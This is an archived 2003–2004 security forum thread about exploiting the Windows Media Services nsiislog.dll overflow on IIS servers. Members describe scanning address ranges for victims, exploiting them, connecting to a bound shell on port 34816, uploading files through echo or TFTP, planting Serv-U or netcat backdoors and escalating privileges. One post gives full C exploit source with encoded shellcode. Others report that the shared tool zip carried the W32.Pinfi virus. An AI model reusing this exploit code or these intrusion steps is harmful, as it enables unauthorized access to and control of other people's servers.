Iis Media Exploit?

GovernmentSecurity.org > The Archives > Exploit Articles

Pages: 1, 2

vnet576

Aug 1 2003, 08:25 PM

I have a question about the IIS media hack. When I try this hack I use the exploit and I get a server exploited return message. So then the hack involves telnetting to the target pc. However...I tried quiete a few computers but i get connection failed when i try to telnet. Anything I'm doing wrong...thx!

woutiir

Aug 1 2003, 08:53 PM

I'm not experienced with this exploit but one thing that might give this same error is a firewall, just try and test it at a server you own, will make things clearer taht the error lies within you or the exploit...

Greetings,
woutiir

vnet576

Aug 1 2003, 08:58 PM

Thx...but I don't use a firewall.

X-Raided

Aug 1 2003, 09:57 PM

What port are you telneting into?

vnet576

Aug 1 2003, 09:58 PM

34816

woutiir

Aug 1 2003, 11:41 PM

Not you, maybe the victim/target is using a firewall

woutiir

GSecur

Aug 1 2003, 11:58 PM

vnet576, give us a bit more information on the exploit, what tool used if any, code source if any.

I'll then test it out on one of the machines I have here and tell you what I find.

vnet576

Aug 2 2003, 01:08 AM

OK...guess I should've done that in the very begining to make it easier. Here I included the exploit...explanation..and scanner for it in a zip file.

GSecur

Aug 2 2003, 01:21 AM

There you go vnet576

Now I can check it out and see what I can do.

rayden5_

Aug 2 2003, 09:08 AM

Hi,

in my case i first get a Warning frm my AntiVirus Software, scan500 is infected with w32.Pinfi ?! Maybe false-Alarm but maybe u just got some trojans there ?

So I Cant test since my Anticvirus immideatlly deletes the file all the time, and i dont want to risk anything on my machine

Ray

woutiir

Aug 2 2003, 10:20 AM

QUOTE

Use This Command : ASD FOUNDIP 34816( it wil say something like host exploited )
Now Try Connecting To This IP .. using TelNet with this command in MSDOS ( telnet FOUNDIP 34816 )
if Dos Says ( cant connect .. U cant hack Your Scan

)

Hmmm, dunno if this adds something to your question, might be a an explanation.. Otherside of the storry, if you tried it on different computers there must be one vulnerable, or just have the 'luck' that they were all patched and or just not vulnerable

P.S. i didn't check it out for my self yet, i'll do soon and post it

Gr. woutiir

vnet576

Aug 2 2003, 04:06 PM

woutiir...I tried alot of computers...~50 by now. I'll keep trying on other vulnerable pcs and if someone figures out whats wrong with the exploit lemme know.

Anyway..thanks guys for trying to help me with this. There aren't really that many security forums on the net these days where the members would actually bother to try out the exploit and see if they could help. Plus theres so much usefull info in all the sections...so I'm gonna stick around in this forum and contribute & learn as much as I can.

GSecur

Aug 2 2003, 05:50 PM

Hmm , I'm having a bit of trouble here, I am running the exploit against a windows 2000 server completly unpatched. But scan500 does not pick it up as vulnerable.

What ver of Media player is vulnerable. If someone has the MS_knowledge base ID that would be great.

vnet576

Aug 2 2003, 06:18 PM

I'm going through their knowledge base and I think it might be this one...although I'm not sure.

http://support.microsoft.com/default.aspx?...kb;en-us;822343

GSecur

Aug 2 2003, 10:38 PM

So far I haven't had any luck. Both using windows 2000 server with no service pack as well as windows 2000 SP2.

I'll keep you posted if I figure it out.

Black_hat

Aug 3 2003, 07:20 PM

I test it ! Nice Security Hole !!!

Black_hat

Aug 7 2003, 07:39 PM

!!!!!!!
Hey scan500.exe infected by virus and All My eXe files Infected bY thiS !!! Please remove this !!! is infected with the W32.Pinfi virus.

It's good tools but i don't like virus ! For more detail of this virus visit :
http://securityresponse.symantec.com/avcenter/venc/data/w32.pinfi.html

W32.Pinfi is a memory-resident polymorphic virus that will infect the .EXE and .SCR files. This virus can also spread via mapped drives and network shares.

don't publish Infected File !!!

<img src='http://forums.governmentsecurity.org/html/emoticons/sad.gif' border='0' style='vertical-align:middle' alt='sad.gif' />
<img src='http://forums.governmentsecurity.org/html/emoticons/ph34r.gif' border='0' style='vertical-align:middle' alt='ph34r.gif' />

Black_Hat

vnet576

Aug 7 2003, 08:39 PM

holy shit...so this is where i got that virus from. I am infected with the exact same virus right now.

HA! Now I know who gave it to me. Sorry that I indavertently spread the virus to u Black_Hat. It was not intentional and I only found out that my pc was infected yesturday.

p3nGu1n

Aug 10 2003, 03:15 AM

QUOTE (vnet576 @ Aug 7 2003, 08:39 PM)

you may not have been infected by this file. the virus may have infected it from some other file...

GSecur

Aug 10 2003, 01:26 PM

Are you guys sure about that? I have been scanning this stuff and it's been coming back negative. I'll keep checking though.

eus

Aug 10 2003, 01:56 PM

You must love NAV :/

Event: Virus Found!
Virus name: W32.Pinfi
File: C:\Documents and Settings\kd\Bureau\IIS_Media\asd.exe
Location: C:\Documents and Settings\kd\Bureau\IIS_Media
Computer: KARL
User: kd
Action taken: Clean succeeded : Access allowed

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: W32.Pinfi
File: C:\Documents and Settings\kd\Bureau\IIS_Media\scan500.exe
Location: C:\Documents and Settings\kd\Bureau\IIS_Media
Computer: KARL
User: kd
Action taken: Clean succeeded : Access allowed
Date found: Sun Aug 10 09:56:01 2003

Just hoping it'll work...

GSecur

Aug 10 2003, 02:05 PM

Alright guys I'll pull it off and re attach a clean version.

axora

Aug 10 2003, 03:22 PM

This shit IS infected!
Took me an hour to remove the virus crap from my pc.

Disable System Restore (Windows Me/XP).
Update the virus definitions.
Restart the computer in Safe mode (Windows 95/98/Me/2000/XP) of VGA mode (Windows NT).
Run a full system scan and repair all the files detected as W32.Pinfi.

HaKaZoR

Aug 11 2003, 03:26 PM

Thanks a lot for this Exploit It 's great !!
But i can't install serv-u in service (to restart with the pc). I have not the permission to do that.
anybody have a solution ?

forums.governmentsecurity.org it's the greatest forum i have seen. big big thanks !!!

spawn543

Aug 11 2003, 03:49 PM

QUOTE (HaKaZoR @ Aug 11 2003, 03:26 PM)

yea id like to know that too hehe

dissolutions

Aug 13 2003, 12:26 AM

QUOTE (vnet576 @ Aug 7 2003, 01:39 PM)

holy sh*t...so this is where i got that virus from. I am infected with the exact same virus right now.

HA! Now I know who gave it to me. Sorry that I indavertently spread the virus to u Black_Hat. It was not intentional and I only found out that my pc was infected yesturday.

rotfl thats funny that definately put a smile on my face.

It's a very common thing actually with "hackers tools" as alot of them come up as viruses in the first place... but a good way of preventing it is to download from reputable sources. like http://www.securityfocus.com for example and make sure to scan and read the code.

lololol kinda funny still i guess no harm no foul.

PSR

Aug 13 2003, 07:00 AM

QUOTE (HaKaZoR @ Aug 11 2003, 03:26 PM)

yea you do have the right just not in the sys32 folder cause you aint got root access thats the problem with this exploit , you dont get root access.

viking

Aug 14 2003, 04:04 PM

Maby a stupid question but with what proggie and how can I scan for iismedia?

flap

Aug 15 2003, 12:21 PM

i think ure just having bad luck.... if i check 50 results of media servers i will only get 2 succesfull hacks... so i guess the number of hackables with the media sploit isnt very high. (maybe a lot of em are already patched)

dperuski

Aug 15 2003, 03:58 PM

QUOTE (vnet576 @ Aug 2 2003, 01:08 AM)

OK...guess I should've done that in the very begining to make it easier. Here I included the exploit...explanation..and scanner for it in a zip file.

Patched a system here, but finding that port open for Telnet locally still. Is that information still available? Maybe that latest worm patch isn't enough?

I appreciate any help.

vnet576

Aug 15 2003, 03:59 PM

here is the information...but I deleted the exploit and the scanner since it was infected:

QUOTE

Scanning ---------------------------------------------------

Download the software in the atachement

secondly download ASD here http://www.geocities.com/mach8442000/asd.zip

1. now upload scan500 to your scan stro and use this command
site exec scan500 -media StartIP EndIP.. if scan500 finds any results it will create a .txt file ( forgot the name

)

Hacking -------------------------------------------------------------

2. Open This .Txt which scan500 has created ..
Unzip And Start ASD In MSDOS
Use This Command : ASD FOUNDIP 34816( it wil say something like host exploited )
Now Try Connecting To This IP .. using TelNet with this command in MSDOS ( telnet FOUNDIP 34816 )
if Dos Says ( cant connect .. U cant hack Your Scan

)
If Dos Says --> cwinnt\system32, than typ cd\ <enter> than typ cd inetpub\scripts\ <enter> now you can up the files because you can't up to winnt\system32\ in MEDIA
Use The Echo Or TFTP Command To Upload Your files and execute them ..

DaMan

Aug 16 2003, 07:24 AM

is it possible to have a new version virus free??? thanks for da compiler

haensy

Aug 16 2003, 08:36 AM

where can i download scan500 ?

flashlord

Sep 21 2003, 07:12 PM

1. is it possible to get admin rights??

2. is it possible to secure the server remotly(after uploading the files)

speedwiz

Sep 23 2003, 09:59 PM

I have the same problem , I can't have admin right so I can't do a service. If anybody have a solution I'm very interested...

bboybojo

Sep 26 2003, 05:56 PM

i can get all files up, but i cant install a service, or create accounts.
SOMEone please help!

big_black

Dec 14 2003, 06:39 AM

can some one give me a link on how to iis exploit thx

Andy

Dec 14 2003, 07:35 AM

if you type whoami u'll find yourself as IWAM_COMPUTERNAME meaning no administrator priviledge. thus u can't touch anything in the registry so no services can be installed unless u elevate your priviledges

Xion

Dec 14 2003, 11:02 AM

Do you find admin right ??

SyN/AcK

Jan 18 2004, 09:41 AM

I know this one is old, but I got it to work using the ASD exploit. I don't know about the virii though... guess that's just how stuff goes sometimes.

cougar

Jan 29 2004, 02:33 PM

Can someone plz post the echo commands for it. I can't get tftp working.

x420

Feb 7 2004, 04:33 PM

hey, would anyone care to send me a copy of the scan500 exe..

gwsphinx@hotmail.com

much appreciated

fre4k

Feb 7 2004, 05:01 PM

QUOTE

hey, would anyone care to send me a copy of the scan500 exe..

gwsphinx@hotmail.com

much appreciated

Check your e-mail

Have Fun

-fre4k

nubela

Feb 9 2004, 04:49 AM

since its just user privilege, how do ya set up a backdoor?

maybe? set up nc on it, and make it load cmd shell again? but will this shell has admin rights?

DerangeD

Feb 9 2004, 09:34 AM

no a cmd started by nc has the same privelege as the user that started netcat

in this case still no admin

nubela

Feb 9 2004, 12:49 PM

oic. hmm.. then maybe i could send a modded serv-u o`er, start it in that folder, den use it to access c:\windows\system32 den site exec? works this way?

s0nar

Feb 9 2004, 02:10 PM

after u have gotten into the IIS user via the media exploit, upload and run a local overflow or other root/admin/system yielding exploit

setthesun

Feb 14 2004, 08:47 AM

BTW If you need source code (and I think it's good idea

);

CODE

// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker //tN [The N0b0D1eS]

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif

char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x04\xa8\x93"
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb"
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e"
"\x53\x06\x04\x04\xab\x04\x6e\x37"
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe"
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04"
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8"
"\x66\x53\x06\x04\x04\xa8\xab\x13"
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05"
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb"
"\x04\x6e\x4b\x06\x04\x04\xc8\x20"
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91"
"\xf9\x04\x6e\x3b\x06\x04\x04\x72"
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e"
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c"
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c"
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb"
"\xfb\x76\x66\x9f\x05\x04\x04\x91"
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04"
"\x04\x6e\x47\x06\x04\x04\xf0\x3b"
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04"
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46"
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04"
"\x4e\xa7\x05\x04\x04\x04\x6e\x43"
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e"
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04"
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b"
"\x05\x04\x04\xab\x76\x7e\x9f\x05"
"\x04\x04\xab\x04\x4e\xa7\x05\x04"
"\x04\x04\x6e\x4f\x06\x04\x04\x72"
"\x7e\xa3\x05\x04\x04\x07\x76\x46"
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf"
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf"
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70"
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf"
"\x05\x04\x04\x72\x7e\xb3\x05\x04"
"\x04\x72\x7e\xbb\x05\x04\x04\x3c"
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb"
"\xfb\xc8\x20\x76\x7e\x03\x06\x04"
"\x04\xab\x76\x7e\xf3\x05\x04\x04"
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3"
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9"
"\xea\xf8\x7e\x53\x06\x04\x04\xab"
"\xa8\x04\x6e\x3f\x06\x04\x04\x04"
"\x4e\xa3\x05\x04\x04\x04\x6e\x57"
"\x06\x04\x04\x12\xa0\x04\x04\x04"
"\x04\x6e\x33\x06\x04\x04\x13\x76"
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac"
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7"
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe"
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff"
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72"
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a"
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac"
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f"
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd"
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4"
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d"
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e"
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa"
"\xfb\x10\x19\x72\x86\x0b\x72\x8e"
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb"
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f"
"\x70\x34\xd0\xb6\xf7\x70\xad\x83"
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6"
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b"
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe"
"\x78\x3f\xff\x10\xf1\xa2\x78\x38"
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0"
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89"
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d"
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b"
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb"
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6"
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96"
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb"
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb"
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7"
"\xfb\x70\x86\x0b\x12\x99\x04\x04"
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb"
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb"
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32"
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99"
"\x89\x9a\x89\x82\xba\xfb\xbe\x83"
"\x92\x8f\xab\x89\x94\x98\x9e\x88"
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e"
"\xab\x89\x94\x98\x9e\x88\x88\xba"
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9"
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba"
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb"
"\x99\x92\x95\x9f\xfb\x97\x92\x88"
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e"
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f"
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97"
"\x94\x88\x9e\x88\x94\x98\x90\x9e"
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9"
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7";

const DWORD default_EIP_pos = 9992; //¯®«®¦¥¨¥ EIP ¢ ¡ãä¥à¥ (sploit)
const DWORD default_EBX_points_to = 9988; //ãª § â¥«ì ¢ EBX ®â®á¨â¥«ì® sploit
//const DWORD default_EIP_value = 0x77F8441B; //¯® íâ®¬ã ¤à. ¤.¡. JMP EDX, ¢ ¤ ®¬ á«ãç ¥ íâ® ¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //íâ® ¥ ¯à¨£®¤¨«®áì
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];

void usage(char* argv[])
{
printf("Dicklamer (: "
"Authors and distributors of this software are not responsible for the misuse or illegal use of this software.\n"
"Description: testing Windows Media Services for buffer overflow vulnerability (Remote Command Execution #2). Binds shell to port 34816 (or higher if port busy).\n"
"Usage: "
"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
"Supported target(s):\n"
"Windows version\t\t\t\tnsiislog.dll version\n"
"------------------------------------------------------------\n"
"2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
exit(0);
}

int main(int argc, char* argv[])
{
#ifdef WIN32
WSADATA wsaData;
#endif
int target_port = 80;
char *nsiislog = nsiislog_default;
int nArgIndex;

if (argc<2) usage(argv);
nArgIndex = 1;
while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
{
switch (argv[nArgIndex++][1])
{
case 'p':
case 'P':
target_port = atoi(argv[nArgIndex++]);
continue;
case 'r':
case 'R':
nsiislog = argv[nArgIndex++];
continue;
default:
usage(argv);
}
}

try {
#ifdef WIN32
WSAStartup(0x0101, &wsaData);
#endif
SOCKET s = socket(AF_INET,SOCK_STREAM,0);
if (s == INVALID_SOCKET) throw("No socket");
sockaddr_in addr;

//Ž¯à¥¤¥«ï¥¬ ¤à¥á á¥à¢ ª
ULONG iaddr = inet_addr(argv[1]);
if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª
hostent *ph = gethostbyname(argv[1]);
if (!ph) throw("Cant resolve hostname");
memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
} else {//€¤à¥á - IP
memcpy(&addr.sin_addr.s_addr,&iaddr,4);
};

addr.sin_family = AF_INET;
addr.sin_port = htons(target_port);
int sizeofaddr=sizeof(addr);

char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
//¯à¨ ¯¥à¥å®¤¥ EIP, EBX ¡ã¤¥â ãª §ë¢ âì ¯®á«¥¤¨© DWORD è¥£® § ¯à®á , £¤¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);

/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;

if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");

sprintf(sploitbuf,
"POST %s HTTP/1.0\r\n"
"Accept: */*\r\n"
"User-Agent: NSPlayer/4.1.0.3917\r\n"
"Content-Type: text/plain\r\n"
"Content-Length: %i\r\n"
"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
"\r\n%s\r\n",
nsiislog,strlen(sploit),sploit);

int snd=send(s,sploitbuf,strlen(sploitbuf),0);
if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
else throw("Cant send exploit");
closesocket(s);
}
catch (char *errmsg)
{

printf("%s\n",errmsg);
return -1;
}
catch (int err_n)
{
printf("error %i\n",err_n);
return err_n;
}
#ifdef WIN32
WSACleanup();
#endif
return 0;
}

D-e-v-i-L

Mar 6 2004, 01:29 PM

can someone send me iis media exploit?
email: odedistheman@walla.co.il
icq: 169772775

please!

som3aa

Mar 7 2004, 03:29 PM

hey m8
when u find port 38416 opened then u have to connect to the vict*m using port 80 to get a shell

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.